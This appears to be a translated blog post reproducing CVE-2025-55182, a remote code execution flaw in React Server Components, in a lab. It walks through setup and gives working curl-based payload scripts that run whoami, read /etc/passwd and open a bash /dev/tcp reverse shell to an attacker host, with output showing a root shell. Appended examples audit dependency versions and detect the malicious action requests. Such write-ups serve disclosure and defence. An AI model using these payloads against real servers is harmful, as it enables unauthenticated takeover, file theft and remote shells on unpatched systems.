Article summary: CVE-2025-55182 is a remote code execution vulnerability in React Server Components affecting React 19.0.0 through 19.2.0, with a CVSS score of 10. An attacker can gain full control of the server by crafting a malicious HTTP request, with no authentication required. The article walks through setting up the vulnerable environment and exploiting it, including PoC code for executing commands, reading sensitive files and obtaining a reverse shell. Affected users are advised to upgrade React promptly to fix this critical vulnerability. Overall score: 85. Categories: vulnerability analysis, vulnerability PoC, web security, application security, vulnerability alert
React Server Components remote code execution vulnerability (CVE-2025-55182) PoC
zyliang
13 December 2025, 15:08, Beijing
I. Vulnerability information
- Vulnerability ID: CVE-2025-55182
- Vulnerability type: deserialization flaw leading to RCE
- Severity: Critical, CVSS score 10
- Summary: a remote code execution vulnerability in React Server Components; an attacker can gain full control of the server by crafting a malicious HTTP request, with no authentication required
- Affected versions: React 19.0.0, 19.1.0, 19.1.1 and 19.2.0
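As an added example (not code from the original post or from the PoC repository), the following Node.js script walks the JSON dependency tree that `npm ls --all --json` prints and reports every `react` package at one of the versions listed above, including transitive copies. Treating the `react-server-dom-*` packages as sharing those version numbers is an assumption of the example, and the sample tree in the script is constructed for the demonstration.

```javascript
// Added example (not from the original post or the PoC repository): audit the
// dependency tree printed by `npm ls --all --json` for React packages at the
// versions the post lists as affected by CVE-2025-55182.

// Affected versions exactly as stated in the post.
const AFFECTED_REACT_VERSIONS = new Set(['19.0.0', '19.1.0', '19.1.1', '19.2.0']);

// `react` is named on the page; treating the react-server-dom-* packages
// (the server-side deserializer the PoC drives) as sharing the same version
// numbers is an assumption of this example.
function isReactServerPackage(name) {
  return name === 'react' || name.startsWith('react-server-dom-');
}

// Recursively walk the `dependencies` objects of an `npm ls --json` tree and
// collect every React package whose version is in the affected set, recording
// the dependency path so transitive copies can be traced to their parent.
function findAffected(tree, path = [], out = []) {
  const deps = (tree && tree.dependencies) || {};
  for (const [name, info] of Object.entries(deps)) {
    const here = [...path, `${name}@${info.version}`];
    if (isReactServerPackage(name) && AFFECTED_REACT_VERSIONS.has(info.version)) {
      out.push({ name, version: info.version, path: here.join(' > ') });
    }
    findAffected(info, here, out);
  }
  return out;
}

// Summarise the walk as a pass/fail verdict plus the list of hits.
function report(tree) {
  const hits = findAffected(tree);
  return { affected: hits.length > 0, hits };
}

// Constructed sample tree (not real output from the post's machines): a direct
// react 19.2.0 and react-server-dom-webpack 19.2.0, plus an unaffected nested
// react 18.3.1 to show that only the listed versions are flagged.
const SAMPLE_TREE = {
  name: 'rsc-app',
  version: '1.0.0',
  dependencies: {
    react: { version: '19.2.0' },
    'react-server-dom-webpack': { version: '19.2.0' },
    express: { version: '4.19.2', dependencies: { react: { version: '18.3.1' } } },
  },
};

console.log(JSON.stringify(report(SAMPLE_TREE), null, 2));
```

To check a real project, save `npm ls --all --json > tree.json`, load it with `fs.readFileSync` and pass the parsed object to `report()`; any hit means the upgrade the post recommends is still outstanding for that dependency path.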
II. Setting up the vulnerable environment
1. Attacker and target hosts
1) Attacker address: 10.182.218.116
2) Target address: 10.182.218.202
The target's glibc must not be too old: below 2.27, Node.js 18 cannot be installed, and running the PoC on an older Node.js release affects its results.
```
root@zyliang-master2:~# ldd --version
ldd (Ubuntu GLIBC 2.35-0ubuntu3.1) 2.35
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
```
2. Install Node.js 18
```bash
# 1. Remove old versions (optional)
sudo apt remove --purge nodejs npm -y
sudo apt autoremove -y

# 2. Add the NodeSource repository (Node.js 18 LTS)
curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -

# 3. Install Node.js 18
sudo apt-get install -y nodejs

# 4. Verify the installation
node --version   # should print v18.x.x
npm --version
```
3. Download the reproduction code
```bash
git clone https://github.com/0xHyperia/CVE-2025-55182-poc.git
```
4. Install dependencies
```bash
cd CVE-2025-55182-poc
npm install
```
5. Verify the dependency installation
```
[email protected] /root/CVE-2025-55182-poc
└── [email protected]
# If the list is empty, try to repair it with:
npm install [email protected]
```
6. Verify the vulnerable environment
1) Start the environment
```
root@zyliang-master2:~/CVE-2025-55182-poc# npm start

> [email protected] start
> node --conditions react-server --conditions webpack src/server.js

Loading: /root/CVE-2025-55182-poc/node_modules/react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.js
decodeAction: function
Server at http://localhost:3002
Manifest: [ 'fs', 'child_process', 'vm', 'util' ]
POST /formaction
FormData: $ACTION_REF_0:  $ACTION_0:0: {"id":"vm#runInThisContext","bound":["1+1"]}
[__webpack_require__] vm
```
2) Validate with the script bundled in the project; a working environment returns success
```
root@zyliang-master2:~/CVE-2025-55182-poc# node exploit-rce-v4.js
=== CVE-2025-55182 - RCE via vm.runInThisContext ===
Test 1: Direct call to vm#runInThisContext with code
1+1 = {"success":true,"result":"2"}
Test 2: vm.runInThisContext with require
RCE attempt: {"success":true,"result":"uid=0(root) gid=0(root) groups=0(root)\n"}
Test 3: Using global.process
RCE attempt 2: {"success":true,"result":"uid=0(root) gid=0(root) groups=0(root)\n"}
root@zyliang-master2:~/CVE-2025-55182-poc# curl -X POST http://localhost:3002/formaction \
  -F '$ACTION_REF_0=' \
  -F '$ACTION_0:0={"id":"child_process#execSync","bound":["whoami"]}'
{"success":true,"result":"root\n"}
root@zyliang-master2:~/CVE-2025-55182-poc#
```
III. Exploitation
1. Executing whoami
1) Payload script
```bash
[root@vulhub-2022-01 POC]# cat exploit-remote-whoami.sh
#!/bin/bash
# CVE-2025-55182 - remote whoami command execution
TARGET_URL="http://10.182.218.202:3002/formaction"

echo "=== CVE-2025-55182 远程RCE测试 - whoami ==="
echo "🎯 目标地址: 10.182.218.202:3002"
echo "📡 执行命令: whoami"

echo "🚀 发送Payload..."
response=$(curl -s -X POST "$TARGET_URL" \
  -F '$ACTION_REF_0=' \
  -F '$ACTION_0:0={"id":"child_process#execSync","bound":["whoami"]}')

echo ""
echo "📊 服务器响应:"
echo "$response"

# Result: extract the "result" field from the JSON response
if echo "$response" | grep -q '"success":true'; then
  result=$(echo "$response" | grep -o '"result":"[^"]*"' | cut -d'"' -f4)
  echo ""
  echo "✅ 漏洞利用成功!"
  echo "👤 当前用户: $result"
else
  echo ""
  echo "❌ 命令执行失败"
  echo "💡 可能原因:"
  echo "   - 服务器未响应"
  echo "   - 漏洞已被修复"
  echo "   - 网络连接问题"
fi

echo ""
echo "⏰ 测试时间: $(date)"
```
2) Result
```
[root@vulhub-2022-01 POC]# ./exploit-remote-whoami.sh
=== CVE-2025-55182 远程RCE测试 - whoami ===
🎯 目标地址: 10.182.218.202:3002
📡 执行命令: whoami
🚀 发送Payload...

📊 服务器响应:
{"success":true,"result":"root\n"}

✅ 漏洞利用成功!
👤 当前用户: root\n

⏰ 测试时间: Fri Dec 12 15:34:43 CST 2025
```
2. Reading a sensitive file
1) Payload script
```bash
[root@vulhub-2022-01 POC]# cat exploit-remote-passwd.sh
#!/bin/bash
# CVE-2025-55182 - remote read of /etc/passwd
TARGET_URL="http://10.182.218.202:3002/formaction"

echo "=== CVE-2025-55182 远程文件读取测试 ==="
echo "🎯 目标地址: 10.182.218.202:3002"
echo "📁 读取文件: /etc/passwd"
echo "🚀 发送文件读取Payload..."
response=$(curl -s -X POST "$TARGET_URL" \
  -F '$ACTION_REF_0=' \
  -F '$ACTION_0:0={"id":"fs#readFileSync","bound":["/etc/passwd","utf8"]}')
echo ""
echo "📊 服务器原始响应:"
echo "$response"

# Parse and display the result; match "success":true so that a failed call is not reported as a success
if echo "$response" | grep -q '"success":true'; then
  echo ""
  echo "✅ 文件读取成功!"
  echo ""
  echo "📋 /etc/passwd 内容摘要:"
  echo "========================"
  # Extract the result field and turn the escaped \n sequences into real line breaks
  result=$(echo "$response" | grep -o '"result":"[^"]*"' | cut -d'"' -f4 | sed 's/\\n/\n/g')
  echo "$result"
  # Save the full response
  timestamp=$(date +%s)
  echo "$response" > /tmp/remote_passwd_result_${timestamp}.txt
  echo ""
  echo "💾 完整结果已保存到: /tmp/remote_passwd_result_${timestamp}.txt"
else
  echo ""
  echo "❌ 文件读取失败"
  echo "💡 可能原因:"
  echo "   - 文件不存在或权限不足"
  echo "   - 服务器响应格式错误"
  echo "   - 漏洞已被修复"
fi
echo ""
echo "⏰ 测试时间: $(date)"
```
2) Result
```
[root@vulhub-2022-01 POC]# ./exploit-remote-passwd.sh
=== CVE-2025-55182 远程文件读取测试 ===
🎯 目标地址: 10.182.218.202:3002
📁 读取文件: /etc/passwd
🚀 发送文件读取Payload...

📊 服务器原始响应:
{"success":true,"result":"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:102:105::/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nsyslog:x:104:111::/home/syslog:/usr/sbin/nologin\n_apt:x:105:65534::/nonexistent:/usr/sbin/nologin\ntss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false\nuuidd:x:107:115::/run/uuidd:/usr/sbin/nologin\nsystemd-oom:x:108:116:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin\ntcpdump:x:109:117::/nonexistent:/usr/sbin/nologin\navahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin\nusbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\ndnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nkernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin\navahi:x:114:121:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin\ncups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin\nrtkit:x:116:123:RealtimeKit,,,:/proc:/usr/sbin/nologin\nwhoopsie:x:117:124::/nonexistent:/bin/false\nsssd:x:118:125:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin\nspeech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false\nnm-openvpn:x:120:126:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin\nsaned:x:121:128::/var/lib/saned:/usr/sbin/nologin\ncolord:x:122:129:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin\ngeoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin\npulse:x:124:131:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin\ngnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false\nhplip:x:126:7:HPLIP system user,,,:/run/hplip:/bin/false\ngdm:x:127:133:Gnome Display Manager:/var/lib/gdm3:/bin/false\nzyliang:x:1000:1000:zyliang,,,:/home/zyliang:/bin/bash\nsshd:x:128:65534::/run/sshd:/usr/sbin/nologin\nilo-ven:x:999:999:Illumio VEN User:/home/ilo-ven:/usr/sbin/nologin\nntp:x:129:136::/nonexistent:/usr/sbin/nologin\ntest:x:1000:1000:Test User:/home/test:/bin/bash\n"}

✅ 文件读取成功!

📋 /etc/passwd 内容摘要:
========================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
```
3. Reverse shell
1) Start a listener on the attacker host
```
[root@vulhub-2022-01 ~]# nc -vnl 9999
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
```
2) Payload script
```bash
[root@vulhub-2022-01 POC]# cat exploit-remote-reverse-shell.sh
#!/bin/bash
# CVE-2025-55182 - remote reverse shell (bash method)
TARGET_URL="http://10.182.218.202:3002/formaction"
ATTACKER_IP="10.182.218.116"
ATTACKER_PORT="9999"

echo "=== CVE-2025-55182 远程反弹Shell攻击 ==="
echo "🎯 目标服务器: 10.182.218.202:3002"
echo "📡 反弹地址: $ATTACKER_IP:$ATTACKER_PORT"
echo "🛠️ 使用方式: bash -i 反弹"
echo ""

echo "📋 攻击准备检查:"
echo "   目标漏洞服务器: 10.182.218.202:3002"
echo "   监听攻击机: $ATTACKER_IP:$ATTACKER_PORT"
echo ""

# Show the listener command
echo "👂 请在攻击机执行监听命令:"
echo "   nc -lvnp $ATTACKER_PORT"
echo ""
# -p makes read print the prompt; a bare string argument is parsed as a variable name
read -r -p "⚠️ 确认攻击机已启动监听,按回车键继续攻击..."

echo ""
echo "🚀 发送bash反弹shell payload..."
echo "   反弹命令: bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1"

# Send the bash reverse shell payload
response=$(curl -s -X POST "$TARGET_URL" \
  -F '$ACTION_REF_0=' \
  -F '$ACTION_0:0={"id":"child_process#execSync","bound":["bash -c \"bash -i >& /dev/tcp/10.182.218.116/9999 0>&1\""]}')

echo ""
echo "📊 服务器响应:"
echo "$response"

# Wait for the connection to establish
echo ""
echo "⏳ 等待连接建立..."
sleep 3

echo ""
echo "🎯 攻击完成!"
echo ""
echo "🔍 结果检查:"
echo "   请检查攻击机 $ATTACKER_IP:$ATTACKER_PORT 是否收到连接"
echo ""
echo "💡 提示:"
echo "   ✅ 如果成功: 您将在监听端看到目标服务器的shell提示符"
echo "   ❌ 如果失败,可能原因:"
echo "      - 目标服务器防火墙阻挡"
echo "      - 网络连通性问题"
echo "      - 目标bash不支持/dev/tcp"
echo ""
echo "⏰ 攻击时间: $(date)"
```
3) Result
```
[root@vulhub-2022-01 POC]# ./exploit-remote-reverse-shell.sh
=== CVE-2025-55182 远程反弹Shell攻击 ===
🎯 目标服务器: 10.182.218.202:3002
📡 反弹地址: 10.182.218.116:9999
🛠️ 使用方式: bash -i 反弹

📋 攻击准备检查:
   目标漏洞服务器: 10.182.218.202:3002
   监听攻击机: 10.182.218.116:9999

👂 请在攻击机执行监听命令:
   nc -lvnp 9999

./exploit-remote-reverse-shell.sh: line 23: read: `⚠️ 确认攻击机已启动监听,按回车键继续攻击...': not a valid identifier

🚀 发送bash反弹shell payload...
   反弹命令: bash -i >& /dev/tcp/10.182.218.116/9999 0>&1
```
4) Shell obtained
```
[root@vulhub-2022-01 ~]# nc -vnl 9999
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.182.218.202.
Ncat: Connection from 10.182.218.202:45468.
root@zyliang-master2:~/CVE-2025-55182-poc# ip a
ip a
Failed to get current terminal: Inappropriate ioctl for device
tty: Inappropriate ioctl for device
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:14:20 brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 10.182.218.202/24 brd 10.182.218.255 scope global noprefixroute ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::255e:ad6:8d01:ca54/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
root@zyliang-master2:~/CVE-2025-55182-poc#
```
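From the defender's side, the request shape used throughout this post (in the server log during environment validation and in all three payload scripts) is the detectable artefact: a multipart POST whose `$ACTION_n:m` field carries JSON with an `id` of the form `module#export` naming a Node built-in such as `child_process`, `fs` or `vm`, plus a `bound` array holding the arguments. The following Node.js triage script is an added example, not code from the original post or the PoC repository: it parses a captured multipart body, decodes those fields and flags ids that resolve to a built-in module or, when an allowlist of registered action ids is supplied, any id outside it. The boundary string, the sample body and the allowlist entries are constructed for the example.

```javascript
// Added example (not from the original post or the PoC repository): parse a
// multipart/form-data request body the way the post's curl commands build it
// and flag `$ACTION_n:m` fields whose JSON `id` names a Node built-in module.

// Pull the boundary out of a Content-Type header value (quoted or bare form).
function boundaryFromContentType(contentType) {
  const m = /boundary=(?:"([^"]+)"|([^;]+))/i.exec(contentType || '');
  return m ? (m[1] || m[2]).trim() : null;
}

// Minimal multipart/form-data parser returning { fieldName: value } for text
// parts. Sufficient for triage of captured bodies; not a full RFC 7578 parser
// (no nested multipart, no file parts, CRLF line endings assumed).
function parseMultipart(body, boundary) {
  const fields = {};
  for (const part of body.split(`--${boundary}`)) {
    if (part === '' || part.startsWith('--')) continue; // preamble / closing marker
    const sep = part.indexOf('\r\n\r\n');
    if (sep === -1) continue;
    const headers = part.slice(0, sep);
    let value = part.slice(sep + 4);
    if (value.endsWith('\r\n')) value = value.slice(0, -2);
    const name = /name="([^"]*)"/.exec(headers);
    if (name) fields[name[1]] = value;
  }
  return fields;
}

// Node modules that must never be reachable through a server action id.
const NODE_BUILTINS = new Set([
  'fs', 'child_process', 'vm', 'util', 'os', 'net', 'http', 'https',
  'worker_threads', 'cluster', 'dgram', 'tls', 'process',
]);

// Inspect decoded fields: high severity when the id resolves to a built-in,
// medium when an allowlist of registered action ids is given and the id is not
// in it. The bound arguments are carried in the finding for the alert.
function inspectActionFields(fields, allowedActionIds = null) {
  const findings = [];
  for (const [field, raw] of Object.entries(fields)) {
    if (!/^\$ACTION_\d+:\d+$/.test(field)) continue;
    let parsed;
    try { parsed = JSON.parse(raw); } catch { continue; }
    if (!parsed || typeof parsed !== 'object' || typeof parsed.id !== 'string') continue;
    const hash = parsed.id.indexOf('#');
    const moduleName = (hash === -1 ? parsed.id : parsed.id.slice(0, hash)).replace(/^node:/, '');
    const bound = Array.isArray(parsed.bound) ? parsed.bound : [];
    if (NODE_BUILTINS.has(moduleName)) {
      findings.push({ field, id: parsed.id, severity: 'high',
        reason: `action id resolves to Node built-in module "${moduleName}"`, bound });
    } else if (allowedActionIds && !allowedActionIds.has(parsed.id)) {
      findings.push({ field, id: parsed.id, severity: 'medium',
        reason: 'action id is not a registered server action', bound });
    }
  }
  return findings;
}

// Convenience wrapper for a captured request: header value plus raw body.
function analyzeRequest(contentType, body, allowedActionIds = null) {
  const boundary = boundaryFromContentType(contentType);
  if (!boundary) return [];
  return inspectActionFields(parseMultipart(body, boundary), allowedActionIds);
}

// Build a multipart body from a field map (used only to construct samples here).
function buildBody(boundary, fields) {
  const parts = [];
  for (const [name, value] of Object.entries(fields)) {
    parts.push(`--${boundary}`, `Content-Disposition: form-data; name="${name}"`, '', value);
  }
  parts.push(`--${boundary}--`, '');
  return parts.join('\r\n');
}

// Constructed sample request (boundary and body built here, not captured from
// the post's machines) carrying the whoami payload shown in the post.
const SAMPLE_CONTENT_TYPE = 'multipart/form-data; boundary=----constructed-boundary';
const SAMPLE_BODY = buildBody('----constructed-boundary', {
  '$ACTION_REF_0': '',
  '$ACTION_0:0': '{"id":"child_process#execSync","bound":["whoami"]}',
});

console.log(JSON.stringify(analyzeRequest(SAMPLE_CONTENT_TYPE, SAMPLE_BODY), null, 2));
```

Run it over a captured body together with the matching Content-Type value; high-severity findings naming `child_process#execSync`, `fs#readFileSync` or `vm#runInThisContext` correspond to the requests shown in this post. The same check can sit in front of the action endpoint (a WAF rule or a middleware that rejects the request before the React deserializer sees it), but that is a stopgap for detection and containment, not a substitute for upgrading to a fixed React release.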
Original article: "React Server Components remote code execution vulnerability (CVE-2025-55182) PoC"